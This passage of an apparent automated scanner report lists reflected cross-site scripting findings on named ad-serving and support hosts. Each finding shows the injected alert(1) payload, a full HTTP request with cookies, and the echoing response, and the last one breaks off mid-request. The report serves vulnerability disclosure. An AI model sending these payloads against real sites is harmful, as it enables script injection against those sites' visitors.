...[SNIP]...

6.148. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1245f'-alert(1)-'7270a6fca4a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kjs:Q'YOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9v`THC)^>; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 12:31:20 GMT
Content-Length: 1533

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAA
...[SNIP]...
D8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a/referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4A
...[SNIP]...

6.149. http://ib.adnxs.com/if [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7eb8'-alert(1)-'d5a2b35f47b was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..f7eb8'-alert(1)-'d5a2b35f47b&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676441&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658441795&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658441813&frm=1&adk=2614322350&ga_vid=596037721.1303658442&ga_sid=1303658442&ga_hid=931360055&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=57
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 15:26:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:26:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:26:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; path=/; expires=Sat, 23-Jul-2011 15:26:47 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 15:26:47 GMT
Content-Length: 3662

<iframe src="http://view.atdmt.com/DEN/iview/289793864/direct/011303658438?click=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1A
...[SNIP]...
AIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAQUCAAQAAAAAXSRlXAAAAAA./cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..f7eb8'-alert(1)-'d5a2b35f47b/referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4A
...[SNIP]...

6.150. http://image.providesupport.com/js/spiffyman/safe-standard.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/spiffyman/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e49bc<script>alert(1)</script>62c313e4a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jse49bc<script>alert(1)</script>62c313e4a2d/spiffyman/safe-standard.js?ps_h=EPGr&ps_t=1303674267005 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 24 Apr 2011 19:46:54 GMT
Content-Length: 570

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /jse49bc<script>alert(1)</script>62c313e4a2d/spiffyman/safe-standard.js?ps_h=EPGr&ps_t=1303674267005
</pre>
<!-- =========================
...[SNIP]...

6.151. http://image.providesupport.com/js/spiffyman/safe-standard.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/spiffyman/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8482e<a>23e1a7a46b8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/spiffyman8482e<a>23e1a7a46b8/safe-standard.js?ps_h=EPGr&ps_t=1303674267005 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sun, 24 Apr 2011 19:46:55 GMT
Content-Length: 548

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/spiffyman8482e<a>23e1a7a46b8/safe-standard.js?ps_h=EPGr&ps_t=1303674267005
</pre>
<!-- ===============================================
...[SNIP]...

6.152. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/revised_60days_baker_728x90.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78a6e"%3balert(1)//8e15db4dae7 was submitted in the mpck parameter. This input was echoed as 78a6e";alert(1)//8e15db4dae7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D78a6e"%3balert(1)//8e15db4dae7&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:53 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:56:49 GMT
ETag: "3eabf9-e85-4a04711d2ea40"
Accept-Ranges: bytes
Content-Length: 5020
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]78a6e";alert(1)//8e15db4dae7
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]78a6e";alert(1)//8e15db4dae7\" target=\"_blank\">
...[SNIP]...

6.153. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/revised_60days_baker_728x90.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcb6"><script>alert(1)</script>3167708e9f3 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D4bcb6"><script>alert(1)</script>3167708e9f3&mpt=[CACHEBUSTER]&mpvc=&placementid=14302119028291151& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:51 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:56:49 GMT
ETag: "3eabf9-e85-4a04711d2ea40"
Accept-Ranges: bytes
Content-Length: 5206
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]4bcb6"><script>alert(1)</script>3167708e9f3" TARGET="_blank">
...[SNIP]...

6.154. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/revised_60days_baker_728x90.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e13"%3balert(1)//6b369a31b9 was submitted in the mpvc parameter. This input was echoed as 65e13";alert(1)//6b369a31b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=65e13"%3balert(1)//6b369a31b9&placementid=14302119028291151& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkZ8R0ZkTjZCUkZycHwxMzAzNjU4NjU0MDYyfDF8MEY5SUVVUHozanwwUkhEamsyckprfEVYXzEwMjM0NzcyMDZ8MjY2NzYw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAnAAAhwgK5WeiMK0_v1fWmDwcBhlvtoikzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5SUVVUHozag&ciu=MFJIRGprMnJKaw&reqid=NERCNDQwOUMwMDAwODcwODBBRTU2N0EyMzBBRDNGQkY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=266&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:30:57 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 21:56:49 GMT
ETag: "3eabf9-e85-4a04711d2ea40"
Accept-Ranges: bytes
Content-Length: 4982
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="65e13";alert(1)//6b369a31b9http://altfarm.mediaplex.com/ad/ck/14302-119028-29115-1?mpt=[CACHEBUSTER]"
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=65e13";alert(1)//6b369a31b9http://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&clickTag=65e13";alert(1)//6b369a31b9http://altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACH
...[SNIP]...

6.155. http://img.mediaplex.com/content/0/14302/119028/revised_60days_baker_728x90.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/14302/119028/revised_60days_baker_728x90.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e10"><script>alert(1)</script>3e1f245044c was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/14302/119028/revised_60days_baker_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-29115-1%3Fmpt%3D%5BCACHEBUSTER%5D&mpt=[CACHEBUSTER]&mpvc=87e10"><script>alert(1)</script>3e1f245044c&placementid=14302119028291151& HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
